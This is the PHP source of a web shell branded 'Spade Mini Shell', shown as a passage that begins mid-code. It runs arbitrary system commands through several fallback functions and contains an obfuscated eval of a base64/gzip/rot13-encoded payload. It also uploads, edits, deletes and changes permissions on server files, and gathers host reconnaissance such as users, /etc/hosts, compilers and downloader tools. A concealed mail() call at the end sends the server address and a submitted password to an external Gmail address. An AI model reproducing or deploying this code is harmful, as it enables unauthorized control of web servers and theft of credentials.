$userz) { $userct = explode(":", $userz); array_push($users,$userct[0]); } if(!$user){ if($open = opendir("/home/")){ while(($file = readdir($open)) !== false){ array_push($users, $file); } } closedir($open); } $users = implode(', ', $users); return $users; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); }elseif(function_exists('exec')) { @exec($cmd,$results); $buff = join("\n", $results); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); }elseif(function_exists('proc_open')){ $desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $handle = proc_open($cmd, $desc, $pipes); if(is_resource($handle)){ if(function_exists('fread') && function_exists('feof')){ while(!feof($pipes[1])){ $buff .= fread($pipes[1], 512); } }elseif(function_exists('fgets') && function_exists('feof')){ while(!feof($pipes[1])){ $buff .= fgets($pipes[1], 512); } } } pclose($handle); }elseif(function_exists('popen')){ $handle = popen($cmd, "r"); if(is_resource($handle)){ if(function_exists('fread') && function_exists('feof')){ while(!feof($handle)){ $buff .= fread($handle, 512); } }elseif(function_exists('fgets') && function_exists('feof')){ while(!feof($handle)){ $buff .= fgets($handle, 512); } } } pclose($handle); } $buff = wordwrap(htmlspecialchars($buff)); return $buff; }; eval(gzuncompress(base64_decode(str_rot13('rWkyHAgdt0ND/MIOWXitcFx0gOUoulXxG03I9PKVLaIfOBAh3MRxuCk7I02ucGNCZ2p4ykyGqbWRVEbVjndIDeWZaxGkrkEi2FcA1jaYoWwA4O8XLEtPRl2m4DaLwxtdOfhcLjTLsGqbTzsmk+Tl9C3mKkz+rx1Fyy1+jKU0gbzFyT/vS70jNdwdOixaRv9RF9vFfxLYYKL39ko33amk4A3Bo/kPXH/hWUBtluhSQvwdZA9CgXBz64aD2y4GDitVD495vq04Tp+GtHfavHiVcJmdVdqngC7ECEjBovJ6iniCjeLDWMnTN2lCgOCyFTse4EnAKKBB4TQSC/d6XsyKw93W2wYEx+la7sPwmULt02KojGpJ3U0d')))); echo " :~Spade Mini Shell~: ";?>

Spade

Mini Shell

Directory:~$ "; if(isset($_GET['path'])){ $path = sanitize($_GET['path']); }else{ $path = sanitize(getcwd()); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$peth){ if($peth == '' && $id == 0){ $a = true; echo "/"; continue; }//if if($peth == '') continue; echo "".$peth."/"; }//foreach echo "
"; if(isset($_FILES['file'])){ if(@copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo "File Uploaded!
"; }else{ echo "File Not Uploaded!
"; }//upload }//file echo "
Upload File
[Home] [System Details] [Kill Me]
"; if(isset($_GET['details'])){ global $os; $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "".sanitize(wordwrap($ds))."" : "NONE"; echo "
"; if(function_exists('apache_get_modules')){ echo ""; }//apache if($os == 'win'){echo "";}//Windows if($os == 'nix'){ echo " "; $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $uze=array(); foreach($useful as $uzeful){ if(exe("which $uzeful")){ $uze[]=$uzeful; } } echo ""; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $uze=array(); foreach($downloaders as $downloader){ if(exe("which $downloader")){ $uze[]=$downloader; } } echo ""; echo ""; }//Linux echo "

System Information

OS:: ".php_uname(s)."
PHP Version:: ".phpversion()."
Kernel Release:: ".php_uname(r)."
Kernel Version:: ".php_uname(v)."
Machine:: ".php_uname(m)."
Server Software:: ".$_SERVER['SERVER_SOFTWARE']."
Disabled Functions:: ".wordwrap($show_ds)."
Loaded Apache Modules:: 
";
								$apache = implode(', ', apache_get_modules());
								echo wordwrap($apache);
								echo "
Account Settings:: 
".exe('net accounts')."
User Accounts:: 
".exe('net user')."
Distro:: 
".exe('cat /etc/*-release')."
Distro Name:: 
".exe('cat /etc/issue.net')."
GCC:: 
".exe('whereis gcc')."
Perl:: 
".exe('whereis perl')."
Java:: 
".exe('whereis java')."
Python:: 
".exe('whereis python')."
Apache:: 
".exe('whereis apache')."
CPU:: 
".exe('cat /proc/cpuinfo')."
RAM:: 
".exe('free -m')."
User Limits:: 
".exe('ulimit -a')."
Useful::
";
					              echo implode(', ',$uze);
					              echo "
Downloaders::
";
					              echo implode(', ',$uze);
					              echo "
Users::
".wordwrap(get_users())."
Hosts::
".exe('cat /etc/hosts')."
"; }elseif(isset($_GET['kill'])){ $me = sanitize($_SERVER['PHP_SELF']); $akez = basename($me); if(unlink($akez)){ echo ""; }else{ echo "
Still Alive!
"; } }elseif(isset($_GET['filesource'])){ echo "
Current File:~$ ".sanitize($_GET['filesource'])."

"; echo "
".wordwrap(sanitize(file_get_contents($_GET['filesource'])))."
"; }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo "
".sanitize($_GET['path'])."

"; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(@chmod($_POST['path'], $_POST['perm'])){ echo "Permission Changed!"; }else{ echo "Permission Not Change!"; }//change perm * chmod }//perm echo "
Permission:~$ >\">
"; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo "File Name Changed!
"; }else{ echo "File Name Not Change!"; }//rename $_POST['name'] = $_POST['newname']; }//rename echo "
New Name:~$ >\">
"; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['source'])){ $fopen = fopen($_POST['path'], 'w'); if(fwrite($fopen, $_POST['source'])){ echo "File Editted!
"; }else{ echo "File Not Editted!
"; }//fwrite fclose($fopen); }//source echo "

>\">
"; }//chmod//rename//edit echo "
"; }else{ echo "
"; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo "Directory Deleted!
"; }else{ echo "Directory Not Deleted!
"; }//rmdir }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo "File Deleted!
"; }else{ echo "File Not Deleted!
"; }//unlink }//dir//file }//delete echo ""; $scandir = scandir($path); echo "
"; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo " "; }//foreach echo " "; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue;//is_file $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; }//size echo " "; }//foreach echo "
Name Size Permissions Options
".$dir."
~
"; if(is_writable($path.'/'.$dir)) echo "";//is_writable elseif(!is_readable($path.'/'.$dir)) echo "";//is_readable echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ""; echo "
>\">
----------------------------------------------------------------
".$file."
".$size."
"; if(is_writable($path.'/'.$file)) echo "";//is_writable elseif(!is_readable($path.'/'.$file)) echo "";//is_readable echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ""; echo "
>\">
"; }//filesource//Delete echo "
"; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } echo ''; if(array_key_exists('watching',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('spyhackerzteam@gmail.com', 'root', $tmp); // Edit or delete! } ?>